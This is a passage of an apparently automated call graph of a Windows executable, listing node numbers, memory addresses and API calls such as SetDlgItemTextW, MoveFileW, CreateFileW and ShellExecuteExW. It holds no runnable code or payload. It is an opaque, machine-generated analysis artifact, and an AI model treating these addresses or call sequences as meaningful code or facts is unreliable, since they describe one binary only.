27006 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26998->27006 26999->26887 27000 7ff693e7c5ff 27004 7ff693e51fa0 31 API calls 27000->27004 27001->26993 27008 7ff693e7b9b1 Sleep 27001->27008 27002->27003 27003->26817 27005 7ff693e7ba25 27003->27005 27007 7ff693e7c60c 27004->27007 27010 7ff693e51fa0 31 API calls 27005->27010 27009 7ff693e7cac0 27006->27009 27007->26980 27012 7ff693e51fa0 31 API calls 27007->27012 27008->26993 27008->27001 27013 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27009->27013 27011 7ff693e7ba42 27010->27011 27014 7ff693e51fa0 31 API calls 27011->27014 27015 7ff693e7c673 27012->27015 27016 7ff693e7cac6 27013->27016 27014->26879 27017 7ff693e5250c SetDlgItemTextW 27015->27017 27019 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27016->27019 27018 7ff693e7c687 FindClose 27017->27018 27020 7ff693e7c797 SendDlgItemMessageW 27018->27020 27021 7ff693e7c6a3 27018->27021 27022 7ff693e7cacc 27019->27022 27023 7ff693e7c7cb 27020->27023 27371 7ff693e7a2cc 10 API calls _handle_error 27021->27371 27026 7ff693e6aae0 48 API calls 27023->27026 27025 7ff693e7c6c6 27027 7ff693e6aae0 48 API calls 27025->27027 27028 7ff693e7c7d8 27026->27028 27029 7ff693e7c6cf 27027->27029 27031 7ff693e5129c 33 API calls 27028->27031 27030 7ff693e6da98 48 API calls 27029->27030 27034 7ff693e7c6ec BuildCatchObjectHelperInternal 27030->27034 27033 7ff693e7c807 27031->27033 27032 7ff693e51fa0 31 API calls 27035 7ff693e7c783 27032->27035 27036 7ff693e51150 33 API calls 27033->27036 27034->26990 27034->27032 27037 7ff693e5250c SetDlgItemTextW 27035->27037 27038 7ff693e7c822 27036->27038 27037->27020 27372 7ff693e5e164 33 API calls 2 library calls 27038->27372 27040 7ff693e7c839 27041 7ff693e51fa0 31 API calls 27040->27041 27042 7ff693e7c845 BuildCatchObjectHelperInternal 27041->27042 27043 7ff693e51fa0 31 API calls 27042->27043 27044 7ff693e7c87f 27043->27044 27045 7ff693e51fa0 31 API calls 27044->27045 27046 7ff693e7c88c 27045->27046 27046->26998 27047 7ff693e51fa0 31 API calls 27046->27047 27048 7ff693e7c8f3 27047->27048 27049 7ff693e5250c SetDlgItemTextW 27048->27049 27050 7ff693e7c907 27049->27050 27050->27054 27373 7ff693e7a2cc 10 API calls _handle_error 27050->27373 27052 7ff693e7c932 27053 7ff693e6aae0 48 API calls 27052->27053 27055 7ff693e7c93c 27053->27055 27054->26889 27054->26966 27054->26970 27054->27016 27056 7ff693e6da98 48 API calls 27055->27056 27058 7ff693e7c959 BuildCatchObjectHelperInternal 27056->27058 27057 7ff693e51fa0 31 API calls 27059 7ff693e7c9f0 27057->27059 27058->27009 27058->27057 27060 7ff693e5250c SetDlgItemTextW 27059->27060 27060->27054 27062 7ff693e5256a 27061->27062 27063 7ff693e525d0 27061->27063 27062->27063 27374 7ff693e6a4ac 27062->27374 27063->26720 27065 7ff693e5258f 27065->27063 27066 7ff693e525a4 GetDlgItem 27065->27066 27066->27063 27067 7ff693e525b7 27066->27067 27067->27063 27068 7ff693e525be SetDlgItemTextW 27067->27068 27068->27063 27070 7ff693e522fc 27069->27070 27071 7ff693e52334 27069->27071 27073 7ff693e5129c 33 API calls 27070->27073 27423 7ff693e523f8 GetWindowTextLengthW 27071->27423 27074 7ff693e5232a BuildCatchObjectHelperInternal 27073->27074 27075 7ff693e52389 27074->27075 27076 7ff693e51fa0 31 API calls 27074->27076 27079 7ff693e523f0 27075->27079 27080 7ff693e523c8 27075->27080 27076->27075 27077 7ff693e82320 _handle_error 8 API calls 27078 7ff693e523dd 27077->27078 27078->26749 27078->26887 27078->26985 27081 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27079->27081 27080->27077 27082 7ff693e523f5 27081->27082 27085 7ff693e58d34 27083->27085 27091 7ff693e58de8 27083->27091 27087 7ff693e58de3 27085->27087 27088 7ff693e58d91 27085->27088 27090 7ff693e58d42 BuildCatchObjectHelperInternal 27085->27090 27435 7ff693e51f80 33 API calls 3 library calls 27087->27435 27088->27090 27092 7ff693e821d0 33 API calls 27088->27092 27090->26769 27436 7ff693e52004 33 API calls std::_Xinvalid_argument 27091->27436 27092->27090 27097 7ff693e7efb0 27093->27097 27094 7ff693e7efd7 27095 7ff693e82320 _handle_error 8 API calls 27094->27095 27096 7ff693e7b537 27095->27096 27096->26783 27097->27094 27437 7ff693e5bd0c 33 API calls 27097->27437 27099 7ff693e7f02a 27100 7ff693e51150 33 API calls 27099->27100 27101 7ff693e7f03f 27100->27101 27102 7ff693e51fa0 31 API calls 27101->27102 27104 7ff693e7f04f BuildCatchObjectHelperInternal 27101->27104 27102->27104 27103 7ff693e51fa0 31 API calls 27105 7ff693e7f076 27103->27105 27104->27103 27106 7ff693e51fa0 31 API calls 27105->27106 27106->27094 27438 7ff693e7ae1c PeekMessageW 27107->27438 27110 7ff693e7f0f5 27114 7ff693e7f101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 27110->27114 27111 7ff693e7f143 IsDlgButtonChecked IsDlgButtonChecked 27112 7ff693e7f189 27111->27112 27113 7ff693e7f1a4 IsDlgButtonChecked 27111->27113 27112->27113 27115 7ff693e7f1c6 IsDlgButtonChecked IsDlgButtonChecked 27113->27115 27116 7ff693e7f1c3 27113->27116 27114->27111 27117 7ff693e7f218 IsDlgButtonChecked 27115->27117 27118 7ff693e7f1f3 IsDlgButtonChecked 27115->27118 27116->27115 27119 7ff693e82320 _handle_error 8 API calls 27117->27119 27118->27117 27120 7ff693e7b578 27119->27120 27120->26822 27124 7ff693e6309d 27121->27124 27126 7ff693e62f8e 27121->27126 27122 7ff693e82320 _handle_error 8 API calls 27123 7ff693e630b3 27122->27123 27123->26847 27123->26848 27124->27122 27125 7ff693e63077 27125->27124 27127 7ff693e63684 56 API calls 27125->27127 27126->27125 27128 7ff693e5129c 33 API calls 27126->27128 27130 7ff693e630c8 27126->27130 27443 7ff693e63684 27126->27443 27127->27124 27128->27126 27131 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27130->27131 27132 7ff693e630cd 27131->27132 27134 7ff693e67fd2 SetCurrentDirectoryW 27133->27134 27135 7ff693e67fcf 27133->27135 27134->26864 27135->27134 27138 7ff693e54255 27136->27138 27137 7ff693e5426a 27140 7ff693e82320 _handle_error 8 API calls 27137->27140 27138->27137 27139 7ff693e5129c 33 API calls 27138->27139 27139->27137 27141 7ff693e542a1 27140->27141 27142 7ff693e53c84 27141->27142 27143 7ff693e53cab 27142->27143 27477 7ff693e5710c 27143->27477 27145 7ff693e53cbb BuildCatchObjectHelperInternal 27145->26904 27148 7ff693e6216a 27146->27148 27147 7ff693e6219e 27150 7ff693e6227f 27147->27150 27152 7ff693e66a0c 49 API calls 27147->27152 27148->27147 27149 7ff693e621b1 CreateFileW 27148->27149 27149->27147 27151 7ff693e622af 27150->27151 27157 7ff693e520b0 33 API calls 27150->27157 27153 7ff693e82320 _handle_error 8 API calls 27151->27153 27154 7ff693e62209 27152->27154 27158 7ff693e622c4 27153->27158 27155 7ff693e6220d CreateFileW 27154->27155 27156 7ff693e62246 27154->27156 27155->27156 27156->27150 27159 7ff693e622d8 27156->27159 27157->27151 27158->26943 27158->26944 27160 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27159->27160 27161 7ff693e622dd 27160->27161 27489 7ff693e7aa08 27162->27489 27164 7ff693e7d1ee 27165 7ff693e51fa0 31 API calls 27164->27165 27166 7ff693e7d1f7 27165->27166 27167 7ff693e82320 _handle_error 8 API calls 27166->27167 27168 7ff693e7bc2b 27167->27168 27168->26951 27169 7ff693e7eefa 27614 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 27169->27614 27172 7ff693e7ef00 27615 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 27172->27615 27173 7ff693e6d22c 33 API calls 27260 7ff693e7cf03 BuildCatchObjectHelperInternal 27173->27260 27175 7ff693e7ef06 27180 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27175->27180 27177 7ff693e7eeee 27178 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27177->27178 27179 7ff693e7eef4 27178->27179 27613 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 27179->27613 27182 7ff693e7ef0c 27180->27182 27184 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27182->27184 27186 7ff693e7ef12 27184->27186 27185 7ff693e7ee4a 27187 7ff693e7eed2 27185->27187 27189 7ff693e520b0 33 API calls 27185->27189 27188 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27186->27188 27611 7ff693e51f80 33 API calls 3 library calls 27187->27611 27193 7ff693e7ef18 27188->27193 27196 7ff693e7ee77 27189->27196 27190 7ff693e7eee8 27612 7ff693e52004 33 API calls std::_Xinvalid_argument 27190->27612 27191 7ff693e513a4 33 API calls 27192 7ff693e7dc3a GetTempPathW 27191->27192 27192->27260 27200 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27193->27200 27194 7ff693e662dc 35 API calls 27194->27260 27610 7ff693e7abe8 33 API calls 3 library calls 27196->27610 27199 7ff693e52520 SetDlgItemTextW 27199->27260 27205 7ff693e7ef1e 27200->27205 27203 7ff693e7ee8d 27210 7ff693e51fa0 31 API calls 27203->27210 27211 7ff693e7eea4 BuildCatchObjectHelperInternal 27203->27211 27204 7ff693e8bb8c 43 API calls 27204->27260 27212 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27205->27212 27207 7ff693e51fa0 31 API calls 27207->27187 27208 7ff693e52034 33 API calls 27208->27260 27209 7ff693e7e7f3 27209->27187 27209->27190 27213 7ff693e821d0 33 API calls 27209->27213 27220 7ff693e7e83b BuildCatchObjectHelperInternal 27209->27220 27210->27211 27211->27207 27214 7ff693e7ef24 27212->27214 27213->27220 27219 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27214->27219 27216 7ff693e7aa08 33 API calls 27216->27260 27217 7ff693e7ef6c 27618 7ff693e52004 33 API calls std::_Xinvalid_argument 27217->27618 27218 7ff693e520b0 33 API calls 27218->27260 27224 7ff693e7ef2a 27219->27224 27228 7ff693e520b0 33 API calls 27220->27228 27269 7ff693e7eb8f 27220->27269 27222 7ff693e51fa0 31 API calls 27222->27185 27223 7ff693e7ef78 27620 7ff693e52004 33 API calls std::_Xinvalid_argument 27223->27620 27234 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27224->27234 27225 7ff693e7ef72 27619 7ff693e51f80 33 API calls 3 library calls 27225->27619 27227 7ff693e7ef66 27617 7ff693e51f80 33 API calls 3 library calls 27227->27617 27235 7ff693e7e963 27228->27235 27231 7ff693e7ed40 27231->27223 27231->27225 27246 7ff693e7ed3b BuildCatchObjectHelperInternal 27231->27246 27251 7ff693e821d0 33 API calls 27231->27251 27233 7ff693e7ec2a 27233->27217 27233->27227 27241 7ff693e7ec72 BuildCatchObjectHelperInternal 27233->27241 27233->27246 27248 7ff693e821d0 33 API calls 27233->27248 27239 7ff693e7ef30 27234->27239 27247 7ff693e5129c 33 API calls 27235->27247 27280 7ff693e7ef60 27235->27280 27238 7ff693e799c8 31 API calls 27238->27260 27252 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27239->27252 27240 7ff693e63d34 51 API calls 27240->27260 27532 7ff693e7f4e0 27241->27532 27243 7ff693e7d5e9 GetDlgItem 27249 7ff693e52520 SetDlgItemTextW 27243->27249 27246->27222 27253 7ff693e7e9a6 27247->27253 27248->27241 27254 7ff693e7d608 IsDlgButtonChecked 27249->27254 27251->27246 27256 7ff693e7ef36 27252->27256 27606 7ff693e6d22c 27253->27606 27254->27260 27255 7ff693e52674 31 API calls 27255->27260 27262 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27256->27262 27259 7ff693e65b60 53 API calls 27259->27260 27260->27164 27260->27169 27260->27172 27260->27173 27260->27175 27260->27177 27260->27179 27260->27182 27260->27185 27260->27186 27260->27191 27260->27193 27260->27194 27260->27199 27260->27204 27260->27205 27260->27208 27260->27209 27260->27214 27260->27216 27260->27218 27260->27224 27260->27238 27260->27239 27260->27240 27260->27255 27260->27256 27260->27259 27261 7ff693e6dc2c 33 API calls 27260->27261 27263 7ff693e7d63c IsDlgButtonChecked 27260->27263 27265 7ff693e63f30 54 API calls 27260->27265 27266 7ff693e7ef3c 27260->27266 27274 7ff693e7ef42 27260->27274 27276 7ff693e51fa0 31 API calls 27260->27276 27278 7ff693e54228 33 API calls 27260->27278 27282 7ff693e65820 33 API calls 27260->27282 27283 7ff693e632a8 51 API calls 27260->27283 27285 7ff693e65aa8 33 API calls 27260->27285 27286 7ff693e58d04 33 API calls 27260->27286 27287 7ff693e5e164 33 API calls 27260->27287 27289 7ff693e5250c SetDlgItemTextW 27260->27289 27292 7ff693e67df4 47 API calls 27260->27292 27293 7ff693e51150 33 API calls 27260->27293 27300 7ff693e632bc 51 API calls 27260->27300 27301 7ff693e7df99 EndDialog 27260->27301 27305 7ff693e7db21 MoveFileW 27260->27305 27309 7ff693e62f58 56 API calls 27260->27309 27311 7ff693e5129c 33 API calls 27260->27311 27493 7ff693e713c4 CompareStringW 27260->27493 27494 7ff693e7a440 27260->27494 27570 7ff693e6cfa4 35 API calls _invalid_parameter_noinfo_noreturn 27260->27570 27571 7ff693e795b4 33 API calls Concurrency::cancel_current_task 27260->27571 27572 7ff693e80684 31 API calls _invalid_parameter_noinfo_noreturn 27260->27572 27573 7ff693e5df4c 47 API calls BuildCatchObjectHelperInternal 27260->27573 27574 7ff693e7a834 33 API calls _invalid_parameter_noinfo_noreturn 27260->27574 27575 7ff693e79518 33 API calls 27260->27575 27576 7ff693e7abe8 33 API calls 3 library calls 27260->27576 27577 7ff693e67368 33 API calls 2 library calls 27260->27577 27578 7ff693e64088 33 API calls 27260->27578 27579 7ff693e665b0 33 API calls 3 library calls 27260->27579 27580 7ff693e672cc 27260->27580 27584 7ff693e51744 33 API calls 4 library calls 27260->27584 27585 7ff693e631bc 27260->27585 27599 7ff693e63ea0 FindClose 27260->27599 27600 7ff693e713f4 CompareStringW 27260->27600 27601 7ff693e79cd0 47 API calls 27260->27601 27602 7ff693e787d8 51 API calls 3 library calls 27260->27602 27603 7ff693e7ab54 33 API calls _handle_error 27260->27603 27604 7ff693e65b08 CompareStringW 27260->27604 27605 7ff693e67eb0 47 API calls 27260->27605 27261->27260 27262->27266 27263->27260 27265->27260 27270 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27266->27270 27269->27231 27269->27233 27272 7ff693e7ef54 27269->27272 27275 7ff693e7ef5a 27269->27275 27270->27274 27273 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27272->27273 27273->27275 27281 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27274->27281 27277 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27275->27277 27276->27260 27277->27280 27278->27260 27616 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 27280->27616 27284 7ff693e7ef48 27281->27284 27282->27260 27283->27260 27288 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27284->27288 27285->27260 27286->27260 27287->27260 27290 7ff693e7ef4e 27288->27290 27289->27260 27294 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27290->27294 27292->27260 27293->27260 27294->27272 27296 7ff693e51fa0 31 API calls 27303 7ff693e7e9d1 27296->27303 27297 7ff693e5129c 33 API calls 27297->27303 27299 7ff693e713c4 CompareStringW 27299->27303 27300->27260 27301->27260 27303->27269 27303->27284 27303->27290 27303->27296 27303->27297 27303->27299 27304 7ff693e6d22c 33 API calls 27303->27304 27304->27303 27306 7ff693e7db55 MoveFileExW 27305->27306 27307 7ff693e7db70 27305->27307 27306->27307 27307->27260 27308 7ff693e51fa0 31 API calls 27307->27308 27308->27307 27309->27260 27311->27260 27313 7ff693e7f9a3 27312->27313 27314 7ff693e520b0 33 API calls 27313->27314 27315 7ff693e7f9b9 27314->27315 27316 7ff693e7f9ee 27315->27316 27317 7ff693e520b0 33 API calls 27315->27317 27633 7ff693e5e34c 27316->27633 27317->27316 27319 7ff693e7fa4b 27653 7ff693e5e7a8 27319->27653 27323 7ff693e7fa61 27324 7ff693e82320 _handle_error 8 API calls 27323->27324 27325 7ff693e7bc52 27324->27325 27325->26967 27328 7ff693e7849c 4 API calls 27327->27328 27329 7ff693e7f3bf 27328->27329 27330 7ff693e7f4b7 27329->27330 27331 7ff693e7f3c7 GetWindow 27329->27331 27333 7ff693e82320 _handle_error 8 API calls 27330->27333 27332 7ff693e7f3e2 27331->27332 27332->27330 27335 7ff693e7f3ee GetClassNameW 27332->27335 27337 7ff693e7f417 GetWindowLongPtrW 27332->27337 27338 7ff693e7f496 GetWindow 27332->27338 27334 7ff693e7be9b 27333->27334 27334->26728 27334->26729 28712 7ff693e713c4 CompareStringW 27335->28712 27337->27338 27339 7ff693e7f429 IsDlgButtonChecked 27337->27339 27338->27330 27338->27332 27339->27338 27340 7ff693e7f445 GetObjectW 27339->27340 28713 7ff693e78504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27340->28713 27342 7ff693e7f461 27343 7ff693e784cc 4 API calls 27342->27343 28714 7ff693e78df4 16 API calls _handle_error 27342->28714 27343->27342 27345 7ff693e7f479 IsDlgButtonChecked DeleteObject 27345->27338 27347 7ff693e5252a SetDlgItemTextW 27346->27347 27348 7ff693e52527 27346->27348 27349 7ff693ebe2e0 27347->27349 27348->27347 27350->26754 27351->26815 27353 7ff693e632bc 51 API calls 27352->27353 27354 7ff693e632b1 27353->27354 27354->26827 27354->26852 27355->26827 27356->26910 27357->26942 27358->26953 27359->26962 27360->26969 27361->26974 27363 7ff693e83620 27362->27363 27363->26978 27364->26896 27366 7ff693e51177 27365->27366 27367 7ff693e52034 33 API calls 27366->27367 27368 7ff693e51185 BuildCatchObjectHelperInternal 27367->27368 27368->26907 27369->26935 27370->27000 27371->27025 27372->27040 27373->27052 27375 7ff693e63e28 swprintf 46 API calls 27374->27375 27376 7ff693e6a509 27375->27376 27377 7ff693e70f68 WideCharToMultiByte 27376->27377 27389 7ff693e6a519 27377->27389 27378 7ff693e6a589 27399 7ff693e69408 27378->27399 27381 7ff693e6a6f2 GetSystemMetrics GetWindow 27385 7ff693e6a821 27381->27385 27398 7ff693e6a71d 27381->27398 27382 7ff693e6a603 27383 7ff693e6a60c GetWindowLongPtrW 27382->27383 27384 7ff693e6a6c2 27382->27384 27387 7ff693ebe2c0 27383->27387 27414 7ff693e695a8 27384->27414 27386 7ff693e82320 _handle_error 8 API calls 27385->27386 27390 7ff693e6a830 27386->27390 27391 7ff693e6a6aa GetWindowRect 27387->27391 27389->27378 27393 7ff693e69800 31 API calls 27389->27393 27396 7ff693e6a56a SetDlgItemTextW 27389->27396 27390->27065 27391->27384 27393->27389 27394 7ff693e6a73e GetWindowRect 27394->27398 27395 7ff693e6a6e5 SetDlgItemTextW 27395->27381 27396->27389 27397 7ff693e6a800 GetWindow 27397->27385 27397->27398 27398->27385 27398->27394 27398->27397 27400 7ff693e695a8 47 API calls 27399->27400 27404 7ff693e6944f 27400->27404 27401 7ff693e6955a 27402 7ff693e82320 _handle_error 8 API calls 27401->27402 27403 7ff693e6958e GetWindowRect GetClientRect 27402->27403 27403->27381 27403->27382 27404->27401 27405 7ff693e5129c 33 API calls 27404->27405 27406 7ff693e6949c 27405->27406 27407 7ff693e5129c 33 API calls 27406->27407 27413 7ff693e695a1 27406->27413 27409 7ff693e69514 27407->27409 27408 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27410 7ff693e695a7 27408->27410 27409->27401 27411 7ff693e6959c 27409->27411 27412 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27411->27412 27412->27413 27413->27408 27415 7ff693e63e28 swprintf 46 API calls 27414->27415 27416 7ff693e695eb 27415->27416 27417 7ff693e70f68 WideCharToMultiByte 27416->27417 27418 7ff693e69603 27417->27418 27419 7ff693e69800 31 API calls 27418->27419 27420 7ff693e6961b 27419->27420 27421 7ff693e82320 _handle_error 8 API calls 27420->27421 27422 7ff693e6962b 27421->27422 27422->27381 27422->27395 27424 7ff693e513a4 33 API calls 27423->27424 27425 7ff693e52462 GetWindowTextW 27424->27425 27426 7ff693e52494 27425->27426 27427 7ff693e5129c 33 API calls 27426->27427 27429 7ff693e524a2 27427->27429 27428 7ff693e524dd 27430 7ff693e82320 _handle_error 8 API calls 27428->27430 27429->27428 27431 7ff693e52505 27429->27431 27432 7ff693e524f3 27430->27432 27433 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27431->27433 27432->27074 27434 7ff693e5250a 27433->27434 27435->27091 27437->27099 27439 7ff693e7ae3c GetMessageW 27438->27439 27440 7ff693e7ae80 GetDlgItem 27438->27440 27441 7ff693e7ae5b IsDialogMessageW 27439->27441 27442 7ff693e7ae6a TranslateMessage DispatchMessageW 27439->27442 27440->27110 27440->27111 27441->27440 27441->27442 27442->27440 27445 7ff693e636b3 27443->27445 27444 7ff693e636e0 27447 7ff693e632bc 51 API calls 27444->27447 27445->27444 27446 7ff693e636cc CreateDirectoryW 27445->27446 27446->27444 27448 7ff693e6377d 27446->27448 27449 7ff693e636ee 27447->27449 27450 7ff693e6378d 27448->27450 27463 7ff693e63d34 27448->27463 27451 7ff693e63791 GetLastError 27449->27451 27453 7ff693e66a0c 49 API calls 27449->27453 27454 7ff693e82320 _handle_error 8 API calls 27450->27454 27451->27450 27455 7ff693e6371c 27453->27455 27456 7ff693e637b9 27454->27456 27457 7ff693e6373b 27455->27457 27458 7ff693e63720 CreateDirectoryW 27455->27458 27456->27126 27459 7ff693e63774 27457->27459 27460 7ff693e637ce 27457->27460 27458->27457 27459->27448 27459->27451 27461 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27460->27461 27462 7ff693e637d3 27461->27462 27464 7ff693e63d5b 27463->27464 27465 7ff693e63d5e SetFileAttributesW 27463->27465 27464->27465 27466 7ff693e63d74 27465->27466 27473 7ff693e63df5 27465->27473 27468 7ff693e66a0c 49 API calls 27466->27468 27467 7ff693e82320 _handle_error 8 API calls 27469 7ff693e63e0a 27467->27469 27470 7ff693e63d99 27468->27470 27469->27450 27471 7ff693e63d9d SetFileAttributesW 27470->27471 27472 7ff693e63dbc 27470->27472 27471->27472 27472->27473 27474 7ff693e63e1a 27472->27474 27473->27467 27475 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27474->27475 27476 7ff693e63e1f 27475->27476 27478 7ff693e5713b 27477->27478 27479 7ff693e57206 27477->27479 27485 7ff693e5714b BuildCatchObjectHelperInternal 27478->27485 27486 7ff693e53f48 33 API calls 2 library calls 27478->27486 27487 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 27479->27487 27482 7ff693e57273 27482->27145 27483 7ff693e5720b 27483->27482 27488 7ff693e5889c 8 API calls BuildCatchObjectHelperInternal 27483->27488 27485->27145 27486->27485 27487->27483 27488->27483 27490 7ff693e7aa2f 27489->27490 27491 7ff693e7aa36 27489->27491 27490->27260 27491->27490 27621 7ff693e51744 33 API calls 4 library calls 27491->27621 27493->27260 27495 7ff693e7a706 27494->27495 27496 7ff693e7a47f 27494->27496 27498 7ff693e82320 _handle_error 8 API calls 27495->27498 27622 7ff693e7cdf8 33 API calls 27496->27622 27500 7ff693e7a717 27498->27500 27499 7ff693e7a49e 27501 7ff693e5129c 33 API calls 27499->27501 27500->27243 27502 7ff693e7a4de 27501->27502 27503 7ff693e5129c 33 API calls 27502->27503 27504 7ff693e7a517 27503->27504 27505 7ff693e5129c 33 API calls 27504->27505 27506 7ff693e7a54a 27505->27506 27623 7ff693e7a834 33 API calls _invalid_parameter_noinfo_noreturn 27506->27623 27508 7ff693e7a734 27509 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27508->27509 27510 7ff693e7a73a 27509->27510 27511 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27510->27511 27512 7ff693e7a740 27511->27512 27515 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27512->27515 27513 7ff693e7a573 27513->27508 27513->27510 27513->27512 27514 7ff693e520b0 33 API calls 27513->27514 27517 7ff693e7a685 27513->27517 27514->27517 27516 7ff693e7a746 27515->27516 27519 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27516->27519 27517->27495 27517->27516 27518 7ff693e7a72f 27517->27518 27520 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27518->27520 27521 7ff693e7a74c 27519->27521 27520->27508 27522 7ff693e5255c 61 API calls 27521->27522 27523 7ff693e7a795 27522->27523 27524 7ff693e7a7b1 27523->27524 27525 7ff693e7a801 SetDlgItemTextW 27523->27525 27529 7ff693e7a7a1 27523->27529 27526 7ff693e82320 _handle_error 8 API calls 27524->27526 27525->27524 27527 7ff693e7a827 27526->27527 27527->27243 27528 7ff693e7a7ad 27528->27524 27530 7ff693e7a7b7 EndDialog 27528->27530 27529->27524 27529->27528 27624 7ff693e6bb00 102 API calls 27529->27624 27530->27524 27533 7ff693e7f87d 27532->27533 27539 7ff693e7f529 __scrt_get_show_window_mode 27532->27539 27534 7ff693e51fa0 31 API calls 27533->27534 27535 7ff693e7f89c 27534->27535 27536 7ff693e82320 _handle_error 8 API calls 27535->27536 27537 7ff693e7f8a8 27536->27537 27537->27246 27538 7ff693e7f684 27541 7ff693e5129c 33 API calls 27538->27541 27539->27538 27625 7ff693e713c4 CompareStringW 27539->27625 27542 7ff693e7f6c0 27541->27542 27543 7ff693e632a8 51 API calls 27542->27543 27544 7ff693e7f6ca 27543->27544 27545 7ff693e51fa0 31 API calls 27544->27545 27546 7ff693e7f6d5 27545->27546 27547 7ff693e7f742 ShellExecuteExW 27546->27547 27550 7ff693e5129c 33 API calls 27546->27550 27548 7ff693e7f846 27547->27548 27554 7ff693e7f755 27547->27554 27548->27533 27552 7ff693e7f8fb 27548->27552 27549 7ff693e7f78e 27627 7ff693e7fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27549->27627 27551 7ff693e7f717 27550->27551 27626 7ff693e65b60 53 API calls 2 library calls 27551->27626 27556 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27552->27556 27553 7ff693e7f7e3 CloseHandle 27557 7ff693e7f801 27553->27557 27558 7ff693e7f7f2 27553->27558 27554->27549 27554->27553 27563 7ff693e7f781 ShowWindow 27554->27563 27561 7ff693e7f900 27556->27561 27557->27548 27567 7ff693e7f837 ShowWindow 27557->27567 27628 7ff693e713c4 CompareStringW 27558->27628 27560 7ff693e7f725 27565 7ff693e51fa0 31 API calls 27560->27565 27563->27549 27564 7ff693e7f7a6 27564->27553 27568 7ff693e7f7b4 GetExitCodeProcess 27564->27568 27566 7ff693e7f72f 27565->27566 27566->27547 27567->27548 27568->27553 27569 7ff693e7f7c7 27568->27569 27569->27553 27570->27260 27571->27260 27572->27260 27573->27260 27574->27260 27575->27260 27576->27260 27577->27260 27578->27260 27579->27260 27581 7ff693e672ea 27580->27581 27629 7ff693e5b3a8 27581->27629 27584->27260 27586 7ff693e631e7 DeleteFileW 27585->27586 27587 7ff693e631e4 27585->27587 27588 7ff693e631fd 27586->27588 27596 7ff693e6327c 27586->27596 27587->27586 27590 7ff693e66a0c 49 API calls 27588->27590 27589 7ff693e82320 _handle_error 8 API calls 27591 7ff693e63291 27589->27591 27592 7ff693e63222 27590->27592 27591->27260 27593 7ff693e63226 DeleteFileW 27592->27593 27594 7ff693e63243 27592->27594 27593->27594 27595 7ff693e632a1 27594->27595 27594->27596 27597 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27595->27597 27596->27589 27598 7ff693e632a6 27597->27598 27600->27260 27601->27260 27602->27260 27603->27260 27604->27260 27605->27260 27607 7ff693e6d25e 27606->27607 27608 7ff693e6d292 27607->27608 27609 7ff693e51744 33 API calls 27607->27609 27608->27303 27609->27607 27610->27203 27611->27190 27613->27169 27614->27172 27615->27175 27616->27227 27617->27217 27619->27223 27621->27491 27622->27499 27623->27513 27624->27528 27625->27538 27626->27560 27627->27564 27628->27557 27632 7ff693e5b3f2 __scrt_get_show_window_mode 27629->27632 27630 7ff693e82320 _handle_error 8 API calls 27631 7ff693e5b4b6 27630->27631 27631->27260 27632->27630 27689 7ff693e686ec 27633->27689 27635 7ff693e5e3c4 27695 7ff693e5e600 27635->27695 27637 7ff693e5e4d4 27640 7ff693e821d0 33 API calls 27637->27640 27638 7ff693e5e549 27641 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27638->27641 27639 7ff693e5e454 27639->27637 27639->27638 27642 7ff693e5e4f0 27640->27642 27650 7ff693e5e54e 27641->27650 27701 7ff693e73148 102 API calls 27642->27701 27644 7ff693e5e51d 27645 7ff693e82320 _handle_error 8 API calls 27644->27645 27647 7ff693e5e52d 27645->27647 27646 7ff693e618c2 27648 7ff693e6190d 27646->27648 27651 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27646->27651 27647->27319 27648->27319 27649 7ff693e51fa0 31 API calls 27649->27650 27650->27646 27650->27648 27650->27649 27652 7ff693e6193b 27651->27652 27654 7ff693e5e7ea 27653->27654 27655 7ff693e5e864 27654->27655 27656 7ff693e5e8a1 27654->27656 27702 7ff693e63ec8 27654->27702 27655->27656 27659 7ff693e5e993 27655->27659 27658 7ff693e5e900 27656->27658 27709 7ff693e5f578 27656->27709 27665 7ff693e5e955 27658->27665 27745 7ff693e528a4 82 API calls 2 library calls 